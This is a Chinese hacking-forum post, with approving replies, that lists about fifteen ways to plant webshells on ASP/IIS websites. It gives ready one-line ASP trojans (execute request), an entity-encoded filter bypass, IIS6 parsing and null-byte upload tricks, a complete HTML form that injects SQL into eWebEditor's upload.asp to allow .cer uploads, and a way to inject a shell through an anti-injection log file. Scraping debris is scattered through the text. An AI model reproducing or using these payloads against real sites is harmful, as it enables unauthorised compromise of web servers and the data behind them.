返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式- m' Q+ f4 r! C  p6 {* h( T0 s/ ]" }

0 ]: U# K4 C4 e- T2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp- e* o" Z+ ?" Y+ K

5 l3 ^. N+ e# E3.上传漏洞:
4 k( y( n- t. y. y0 P
% K) m7 `8 D& W动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
( U. a/ d( k$ {
  b7 m$ O- A& _3 X逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
9 W+ L4 k) b- i0 p# K
9 m5 F2 J. L! y! [+ U0 |雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp. ^8 \. }5 W& W: W7 P8 f$ X1 C% t
然后在上传文件里面填要传的图片格式的ASP木马
8 C5 @1 r: o4 y; w6 d& l8 h就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
2 Y0 _6 X7 F$ j6 f4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
& p! p$ p) L8 t) ?+ W1 ?' r
1 {  w7 x. J) v7 n- }9 _8 j( `5 m<html>
; c6 q$ P' O2 `3 @/ f) H$ B<head>
9 [2 @9 Q2 ^& {8 g& y- L* d3 ?<title>ewebeditor upload.asp上传利用</title>
9 y+ c) T, T% i: g! `5 y</head>% Z* i. c; l+ J" o6 n. y
<body>% _9 H! N2 V6 b/ H% ]# ]9 J5 S1 O  n
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">; e- N0 [. h' ~) O
<input type=file name=uploadfile size=100><br><br>
  h. F# A% Y/ K8 h0 C  a( q8 p" |$ X<input type=submit value=Fuck># h: F8 S. o' t9 \
</form>! `9 z( L' Q- A% v
</body>& Y2 z6 m& L+ b9 [* Z
</form>
& |1 U6 ]' V6 n. Y4 X7 c: @</html>7 X1 W8 H% C& f3 a, \3 I+ i

" H7 K: L9 I% r; G9 r2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
6 w6 [- j2 N6 m& V3 ]; x5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
: c. ^( x1 n1 R0 B: e' ~6 D, B
; P- r/ w6 k3 {) j6 D/ ~! E3 o利用windows2003解析。建立zjq.asp的文件夹
* w: Y. ?4 e# {+ w6 U7 m
6 h% u6 k/ C( x( W+ o5 I( u" v- C6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型" ]% s7 ^  M! t' y9 W% k5 g7 T

* z  s+ q& [2 U# S7.cuteeditor:类似ewebeditor1 q! C8 v* T! a' ~. Q1 E
5 K9 f0 E6 h: ^0 h
8.htmleditor:同上
- s- _$ ^0 v1 b
; `( [; `  G* Q; e6 W9 U9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
4 D- S' j5 i; ^' M
7 ]# Q* q! U& L9 V1 ]* h4 f<%execute request("value")%><%'<% loop <%:%>$ i# o  v; Z, N/ n% b

9 S8 X1 O+ V/ t8 S) Y" X9 a/ G<%'<% loop <%:%><%execute request("value")%>
# I1 q$ \" @" D# j/ o8 r6 g
% U4 Y0 ]# i* r- [* O1 f2 A; ?<%execute request("value")'<% loop <%:%>
- q6 G8 {* I7 j9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
2 t: R! Y; O' P: O
9 P, M' z* Z, w+ h8 J10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞$ a3 l9 m6 M) J4 |: z

) ]3 a$ a2 I% x2 q7 @11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
+ {4 l5 K9 u. J4 [5 f4 ~  X  {, w3 @4 e
解析漏洞得到webshell
) ^4 O. `; g1 z8 y, J/ [
# t+ ?3 O: l9 P, g12.mssql差异备份,日志备份,前提需知道web路径) H' z5 P7 X6 {. y# a9 L

# \  d: @0 r/ [5 e2 f# F13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell( I9 G% s5 ]8 v6 u! Y# f
8 h: A6 `  G6 Z1 s1 n
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell) Q: z7 P5 M, I! R  b
. Z9 g. m) ~; A4 ^
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可+ {- X$ V- R6 }
7 y5 q! \  U' N7 T
以上只是本人的一些拙见,并不完善,以后想到了再继续添加& g! v% ^0 K, L* p3 Y& ~1 e
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 9 s* n: s; `' _1 T1 y1 A! |

0 g- b7 S4 S4 A# L/ F, `$ ^& f2 [+ j( z* ?$ l$ V
很好啊、基本的入侵方法都包含了3 \: ]$ ?1 }# @2 I" P

. b( }/ `' l6 z5 p最好来个提权的帖子再。; Z9 ^+ g( e( k! |/ S+ o& I* C
% u1 U; }) s7 }% W. m) ?
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表